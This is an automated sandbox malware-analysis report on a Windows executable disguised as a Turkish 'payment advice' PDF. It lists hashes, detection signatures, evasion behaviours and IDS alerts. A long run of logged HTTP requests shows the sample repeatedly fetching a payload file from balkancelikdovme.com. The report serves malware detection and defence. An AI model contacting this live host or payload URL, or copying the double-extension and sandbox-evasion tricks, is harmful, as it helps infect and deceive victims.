Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U00d6deme tavsiyesi.pdf.exe

Overview

General Information

Sample name:#U00d6deme tavsiyesi.pdf.exe
renamed because original name is a hash value
Original sample name:deme tavsiyesi.pdf.exe
Analysis ID:1576080
MD5:9d1dfcf9ec726eff98e8ecb0f7f38729
SHA1:178e8d2fde6979de112a0d8441c08a92755a06f5
SHA256:0e4b30f5efd13331e1a56c869e005ce86bfd2d0bfef5e5540371de51e5aef9fd
Tags:exeuser-adrian__luca
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • #U00d6deme tavsiyesi.pdf.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe" MD5: 9D1DFCF9EC726EFF98E8ECB0F7F38729)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe", CommandLine: "C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe, NewProcessName: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe, OriginalFileName: C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Users\user\Desktop\#U00d6deme tavsiyesi.pdf.exe", ProcessId: 7264, ProcessName: #U00d6deme tavsiyesi.pdf.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-16T14:17:46.112577+010028033053Unknown Traffic192.168.2.749701185.181.116.217443TCP
2024-12-16T14:17:47.978724+010028033053Unknown Traffic192.168.2.749702185.181.116.217443TCP
2024-12-16T14:17:49.834422+010028033053Unknown Traffic192.168.2.749703185.181.116.217443TCP
2024-12-16T14:17:53.584828+010028033053Unknown Traffic192.168.2.749706185.181.116.217443TCP
2024-12-16T14:17:55.457917+010028033053Unknown Traffic192.168.2.749707185.181.116.217443TCP
2024-12-16T14:17:57.313537+010028033053Unknown Traffic192.168.2.749713185.181.116.217443TCP
2024-12-16T14:17:59.166120+010028033053Unknown Traffic192.168.2.749719185.181.116.217443TCP
2024-12-16T14:18:01.036456+010028033053Unknown Traffic192.168.2.749727185.181.116.217443TCP
2024-12-16T14:18:02.889313+010028033053Unknown Traffic192.168.2.749734185.181.116.217443TCP
2024-12-16T14:18:04.743628+010028033053Unknown Traffic192.168.2.749741185.181.116.217443TCP
2024-12-16T14:18:06.596029+010028033053Unknown Traffic192.168.2.749743185.181.116.217443TCP
2024-12-16T14:18:08.454876+010028033053Unknown Traffic192.168.2.749748185.181.116.217443TCP
2024-12-16T14:18:10.431413+010028033053Unknown Traffic192.168.2.749753185.181.116.217443TCP
2024-12-16T14:18:12.283636+010028033053Unknown Traffic192.168.2.749759185.181.116.217443TCP
2024-12-16T14:18:14.343470+010028033053Unknown Traffic192.168.2.749765185.181.116.217443TCP
2024-12-16T14:18:16.199033+010028033053Unknown Traffic192.168.2.749771185.181.116.217443TCP
2024-12-16T14:18:18.052169+010028033053Unknown Traffic192.168.2.749776185.181.116.217443TCP
2024-12-16T14:18:20.110329+010028033053Unknown Traffic192.168.2.749781185.181.116.217443TCP
2024-12-16T14:18:22.038904+010028033053Unknown Traffic192.168.2.749787185.181.116.217443TCP
2024-12-16T14:18:23.929313+010028033053Unknown Traffic192.168.2.749792185.181.116.217443TCP
2024-12-16T14:18:25.795955+010028033053Unknown Traffic192.168.2.749796185.181.116.217443TCP
2024-12-16T14:18:27.653563+010028033053Unknown Traffic192.168.2.749802185.181.116.217443TCP
2024-12-16T14:18:29.507301+010028033053Unknown Traffic192.168.2.749808185.181.116.217443TCP
2024-12-16T14:18:31.414148+010028033053Unknown Traffic192.168.2.749813185.181.116.217443TCP
2024-12-16T14:18:33.268571+010028033053Unknown Traffic192.168.2.749819185.181.116.217443TCP
2024-12-16T14:18:35.123962+010028033053Unknown Traffic192.168.2.749824185.181.116.217443TCP
2024-12-16T14:18:36.987416+010028033053Unknown Traffic192.168.2.749829185.181.116.217443TCP
2024-12-16T14:18:38.854885+010028033053Unknown Traffic192.168.2.749833185.181.116.217443TCP
2024-12-16T14:18:40.747645+010028033053Unknown Traffic192.168.2.749840185.181.116.217443TCP
2024-12-16T14:18:42.602356+010028033053Unknown Traffic192.168.2.749845185.181.116.217443TCP
2024-12-16T14:18:44.458266+010028033053Unknown Traffic192.168.2.749851185.181.116.217443TCP
2024-12-16T14:18:46.313154+010028033053Unknown Traffic192.168.2.749856185.181.116.217443TCP
2024-12-16T14:18:48.280600+010028033053Unknown Traffic192.168.2.749861185.181.116.217443TCP
2024-12-16T14:18:50.151536+010028033053Unknown Traffic192.168.2.749867185.181.116.217443TCP
2024-12-16T14:18:52.177097+010028033053Unknown Traffic192.168.2.749872185.181.116.217443TCP
2024-12-16T14:18:54.123106+010028033053Unknown Traffic192.168.2.749876185.181.116.217443TCP
2024-12-16T14:18:56.034767+010028033053Unknown Traffic192.168.2.749882185.181.116.217443TCP
2024-12-16T14:18:57.965432+010028033053Unknown Traffic192.168.2.749888185.181.116.217443TCP
2024-12-16T14:18:59.873447+010028033053Unknown Traffic192.168.2.749894185.181.116.217443TCP
2024-12-16T14:19:01.769816+010028033053Unknown Traffic192.168.2.749899185.181.116.217443TCP
2024-12-16T14:19:03.760281+010028033053Unknown Traffic192.168.2.749904185.181.116.217443TCP
2024-12-16T14:19:05.647266+010028033053Unknown Traffic192.168.2.749910185.181.116.217443TCP
2024-12-16T14:19:07.572242+010028033053Unknown Traffic192.168.2.749915185.181.116.217443TCP
2024-12-16T14:19:09.566308+010028033053Unknown Traffic192.168.2.749919185.181.116.217443TCP
2024-12-16T14:19:11.531694+010028033053Unknown Traffic192.168.2.749924185.181.116.217443TCP
2024-12-16T14:19:13.438039+010028033053Unknown Traffic192.168.2.749930185.181.116.217443TCP
2024-12-16T14:19:15.293809+010028033053Unknown Traffic192.168.2.749936185.181.116.217443TCP
2024-12-16T14:19:17.154082+010028033053Unknown Traffic192.168.2.749940185.181.116.217443TCP
2024-12-16T14:19:19.009665+010028033053Unknown Traffic192.168.2.749944185.181.116.217443TCP
2024-12-16T14:19:20.877154+010028033053Unknown Traffic192.168.2.749949185.181.116.217443TCP
2024-12-16T14:19:22.729998+010028033053Unknown Traffic192.168.2.749954185.181.116.217443TCP
2024-12-16T14:19:24.604945+010028033053Unknown Traffic192.168.2.749960185.181.116.217443TCP
2024-12-16T14:19:26.459187+010028033053Unknown Traffic192.168.2.749965185.181.116.217443TCP
2024-12-16T14:19:28.343557+010028033053Unknown Traffic192.168.2.749969185.181.116.217443TCP
2024-12-16T14:19:30.200112+010028033053Unknown Traffic192.168.2.749975185.181.116.217443TCP
2024-12-16T14:19:32.055166+010028033053Unknown Traffic192.168.2.749980185.181.116.217443TCP
2024-12-16T14:19:33.917454+010028033053Unknown Traffic192.168.2.749986185.181.116.217443TCP
2024-12-16T14:19:35.782986+010028033053Unknown Traffic192.168.2.749990185.181.116.217443TCP
2024-12-16T14:19:37.647453+010028033053Unknown Traffic192.168.2.749996185.181.116.217443TCP
2024-12-16T14:19:39.511138+010028033053Unknown Traffic192.168.2.750001185.181.116.217443TCP
2024-12-16T14:19:41.385319+010028033053Unknown Traffic192.168.2.750006185.181.116.217443TCP
2024-12-16T14:19:43.246823+010028033053Unknown Traffic192.168.2.750012185.181.116.217443TCP
2024-12-16T14:19:45.103285+010028033053Unknown Traffic192.168.2.750017185.181.116.217443TCP
2024-12-16T14:19:46.959092+010028033053Unknown Traffic192.168.2.750022185.181.116.217443TCP
2024-12-16T14:19:48.813997+010028033053Unknown Traffic192.168.2.750027185.181.116.217443TCP
2024-12-16T14:19:50.667935+010028033053Unknown Traffic192.168.2.750032185.181.116.217443TCP
2024-12-16T14:19:52.523745+010028033053Unknown Traffic192.168.2.750038185.181.116.217443TCP
2024-12-16T14:19:54.401433+010028033053Unknown Traffic192.168.2.750039185.181.116.217443TCP
2024-12-16T14:19:56.261645+010028033053Unknown Traffic192.168.2.750040185.181.116.217443TCP
2024-12-16T14:19:58.121051+010028033053Unknown Traffic192.168.2.750041185.181.116.217443TCP
2024-12-16T14:19:59.994694+010028033053Unknown Traffic192.168.2.750042185.181.116.217443TCP
2024-12-16T14:20:01.892600+010028033053Unknown Traffic192.168.2.750043185.181.116.217443TCP
2024-12-16T14:20:03.793460+010028033053Unknown Traffic192.168.2.750044185.181.116.217443TCP
2024-12-16T14:20:05.649515+010028033053Unknown Traffic192.168.2.750045185.181.116.217443TCP
2024-12-16T14:20:07.502994+010028033053Unknown Traffic192.168.2.750046185.181.116.217443TCP
2024-12-16T14:20:09.360570+010028033053Unknown Traffic192.168.2.750047185.181.116.217443TCP
2024-12-16T14:20:11.218119+010028033053Unknown Traffic192.168.2.750048185.181.116.217443TCP
2024-12-16T14:20:13.073572+010028033053Unknown Traffic192.168.2.750049185.181.116.217443TCP
2024-12-16T14:20:14.931973+010028033053Unknown Traffic192.168.2.750050185.181.116.217443TCP
2024-12-16T14:20:16.789351+010028033053Unknown Traffic192.168.2.750051185.181.116.217443TCP
2024-12-16T14:20:18.658975+010028033053Unknown Traffic192.168.2.750052185.181.116.217443TCP
2024-12-16T14:20:20.518799+010028033053Unknown Traffic192.168.2.750053185.181.116.217443TCP
2024-12-16T14:20:22.374764+010028033053Unknown Traffic192.168.2.750054185.181.116.217443TCP
2024-12-16T14:20:24.264284+010028033053Unknown Traffic192.168.2.750055185.181.116.217443TCP
2024-12-16T14:20:26.123338+010028033053Unknown Traffic192.168.2.750056185.181.116.217443TCP
2024-12-16T14:20:27.977203+010028033053Unknown Traffic192.168.2.750057185.181.116.217443TCP
2024-12-16T14:20:29.841170+010028033053Unknown Traffic192.168.2.750058185.181.116.217443TCP
2024-12-16T14:20:31.694103+010028033053Unknown Traffic192.168.2.750059185.181.116.217443TCP
2024-12-16T14:20:33.551246+010028033053Unknown Traffic192.168.2.750060185.181.116.217443TCP
2024-12-16T14:20:35.467830+010028033053Unknown Traffic192.168.2.750061185.181.116.217443TCP
2024-12-16T14:20:37.361559+010028033053Unknown Traffic192.168.2.750062185.181.116.217443TCP
2024-12-16T14:20:39.214167+010028033053Unknown Traffic192.168.2.750063185.181.116.217443TCP
2024-12-16T14:20:43.007958+010028033053Unknown Traffic192.168.2.750065185.181.116.217443TCP
2024-12-16T14:20:46.724755+010028033053Unknown Traffic192.168.2.750067185.181.116.217443TCP
2024-12-16T14:20:52.353516+010028033053Unknown Traffic192.168.2.750070185.181.116.217443TCP
2024-12-16T14:21:03.704821+010028033053Unknown Traffic192.168.2.750076185.181.116.217443TCP
2024-12-16T14:21:09.304617+010028033053Unknown Traffic192.168.2.750079185.181.116.217443TCP
2024-12-16T14:21:13.022277+010028033053Unknown Traffic192.168.2.750081185.181.116.217443TCP
2024-12-16T14:21:14.898290+010028033053Unknown Traffic192.168.2.750082185.181.116.217443TCP
2024-12-16T14:21:16.756862+010028033053Unknown Traffic192.168.2.750083185.181.116.217443TCP
2024-12-16T14:21:18.618994+010028033053Unknown Traffic192.168.2.750084185.181.116.217443TCP
2024-12-16T14:21:20.496592+010028033053Unknown Traffic192.168.2.750085185.181.116.217443TCP
2024-12-16T14:21:22.352000+010028033053Unknown Traffic192.168.2.750086185.181.116.217443TCP
2024-12-16T14:21:24.208885+010028033053Unknown Traffic192.168.2.750087185.181.116.217443TCP
2024-12-16T14:21:26.072876+010028033053Unknown Traffic192.168.2.750088185.181.116.217443TCP
2024-12-16T14:21:28.121817+010028033053Unknown Traffic192.168.2.750089185.181.116.217443TCP
2024-12-16T14:21:29.982486+010028033053Unknown Traffic192.168.2.750090185.181.116.217443TCP
2024-12-16T14:21:31.842370+010028033053Unknown Traffic192.168.2.750091185.181.116.217443TCP
2024-12-16T14:21:33.699113+010028033053Unknown Traffic192.168.2.750092185.181.116.217443TCP
2024-12-16T14:21:35.625859+010028033053Unknown Traffic192.168.2.750093185.181.116.217443TCP
2024-12-16T14:21:37.499341+010028033053Unknown Traffic192.168.2.750094185.181.116.217443TCP
2024-12-16T14:21:39.471871+010028033053Unknown Traffic192.168.2.750095185.181.116.217443TCP
2024-12-16T14:21:41.325644+010028033053Unknown Traffic192.168.2.750096185.181.116.217443TCP
2024-12-16T14:21:43.310136+010028033053Unknown Traffic192.168.2.750097185.181.116.217443TCP
2024-12-16T14:21:45.234451+010028033053Unknown Traffic192.168.2.750098185.181.116.217443TCP
2024-12-16T14:21:47.133270+010028033053Unknown Traffic192.168.2.750099185.181.116.217443TCP
2024-12-16T14:21:49.020578+010028033053Unknown Traffic192.168.2.750100185.181.116.217443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: #U00d6deme tavsiyesi.pdf.exeAvira: detected
Source: #U00d6deme tavsiyesi.pdf.exeReversingLabs: Detection: 65%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: #U00d6deme tavsiyesi.pdf.exeJoe Sandbox ML: detected
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 185.181.116.217:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: #U00d6deme tavsiyesi.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
Source: global trafficHTTP traffic detected: GET /eyiiam/Qtmwlbz.dat HTTP/1.1Host: balkancelikdovme.com
